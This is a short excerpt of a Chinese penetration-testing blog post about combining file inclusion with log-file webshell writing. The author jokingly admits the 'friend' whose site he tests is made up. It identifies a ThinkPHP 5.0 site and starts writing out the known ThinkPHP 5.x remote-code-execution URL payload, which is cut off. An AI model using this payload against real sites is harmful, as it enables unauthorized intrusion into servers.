渗透测试实战-文件包含和日志文件写入木马混合利用
1.起因我有一个朋友,让我帮忙测试一下他的站,于是有了这篇文章。(无中生友篇)2.信息收集访问首页一下先,看到是thinkphp v5.0版本。然后谷歌大法,直接上TP 5.X RCE的EXP,一顿骚操作:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=sy...
